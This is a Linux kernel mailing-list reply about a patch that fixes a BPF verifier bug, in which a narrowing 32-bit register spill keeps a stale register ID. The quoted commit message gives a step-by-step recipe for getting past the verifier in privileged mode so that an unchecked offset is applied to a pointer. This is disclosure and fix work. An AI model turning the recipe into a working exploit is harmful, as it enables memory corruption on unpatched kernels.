On Tue, 06 Jun 2023 at 18:32:37 -0700, Yonghong Song wrote: > > > On 6/6/23 2:42 PM, Maxim Mikityanskiy wrote: > > From: Maxim Mikityanskiy <maxim@xxxxxxxxxxxxx> > > > > The following scenario describes a verifier bypass in privileged mode > > (CAP_BPF or CAP_SYS_ADMIN): > > > > 1. Prepare a 32-bit rogue number. > > 2. Put the rogue number into the upper half of a 64-bit register, and > > roll a random (unknown to the verifier) bit in the lower half. The > > rest of the bits should be zero (although variations are possible). > > 3. Assign an ID to the register by MOVing it to another arbitrary > > register. > > 4. Perform a 32-bit spill of the register, then perform a 32-bit fill to > > another register. Due to a bug in the verifier, the ID will be > > preserved, although the new register will contain only the lower 32 > > bits, i.e. all zeros except one random bit. > > > > At this point there are two registers with different values but the same > > ID, which means the integrity of the verifier state has been corrupted. > > Next steps show the actual bypass: > > > > 5. Compare the new 32-bit register with 0. In the branch where it's > > equal to 0, the verifier will believe that the original 64-bit > > register is also 0, because it has the same ID, but its actual value > > still contains the rogue number in the upper half. > > Some optimizations of the verifier prevent the actual bypass, so > > extra care is needed: the comparison must be between two registers, > > and both branches must be reachable (this is why one random bit is > > needed). Both branches are still suitable for the bypass. > > 6. Right shift the original register by 32 bits to pop the rogue number. > > 7. Use the rogue number as an offset with any pointer. The verifier will > > believe that the offset is 0, while in reality it's the given number. > > > > The fix is similar to the 32-bit BPF_MOV handling in check_alu_op for > > SCALAR_VALUE. If the spill is narrowing the actual register value, don't > > keep the ID, make sure it's reset to 0. > > > > Fixes: 354e8f1970f8 ("bpf: Support <8-byte scalar spill and refill") > > Signed-off-by: Maxim Mikityanskiy <maxim@xxxxxxxxxxxxx> > > LGTM with a small nit below. > > Acked-by: Yonghong Song <yhs@xxxxxx> > > > --- > > kernel/bpf/verifier.c | 7 +++++++ > > 1 file changed, 7 insertions(+) > > > > diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c > > index 5871aa78d01a..7be23eced561 100644 > > --- a/kernel/bpf/verifier.c > > +++ b/kernel/bpf/verifier.c > > @@ -3856,6 +3856,8 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env, > > mark_stack_slot_scratched(env, spi); > > if (reg && !(off % BPF_REG_SIZE) && register_is_bounded(reg) && > > !register_is_null(reg) && env->bpf_capable) { > > + bool reg_value_fits; > > + > > if (dst_reg != BPF_REG_FP) { > > /* The backtracking logic can only recognize explicit > > * stack slot address like [fp - 8]. Other spill of > > @@ -3867,7 +3869,12 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env, > > if (err) > > return err; > > } > > + > > + reg_value_fits = fls64(reg->umax_value) <= BITS_PER_BYTE * size; > > save_register_state(state, spi, reg, size); > > + /* Break the relation on a narrowing spill. */ > > + if (!reg_value_fits) > > + state->stack[spi].spilled_ptr.id = 0; > > I think the code can be simplied like below: > > --- a/kernel/bpf/verifier.c > +++ b/kernel/bpf/verifier.c > @@ -4230,6 +4230,8 @@ static int check_stack_write_fixed_off(struct > bpf_verifier_env *env, > return err; > } > save_register_state(state, spi, reg, size); > + if (fls64(reg->umax_value) > BITS_PER_BYTE * size) > + state->stack[spi].spilled_ptr.id = 0; > } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) && > insn->imm != 0 && env->bpf_capable) { > struct bpf_reg_state fake_reg = {}; > That's true, I kept the variable to avoid churn when I send a follow-up improvement: + /* Make sure that reg had an ID to build a relation on spill. */ + if (reg_value_fits && !reg->id) + reg->id = ++env->id_gen; save_register_state(state, spi, reg, size); But yeah, I agree, let's simplify it for now, there is no guarantee that the follow-up patch will be accepted as is. Thanks for the review! > > } else if (!reg && !(off % BPF_REG_SIZE) && is_bpf_st_mem(insn) && > > insn->imm != 0 && env->bpf_capable) { > > struct bpf_reg_state fake_reg = {};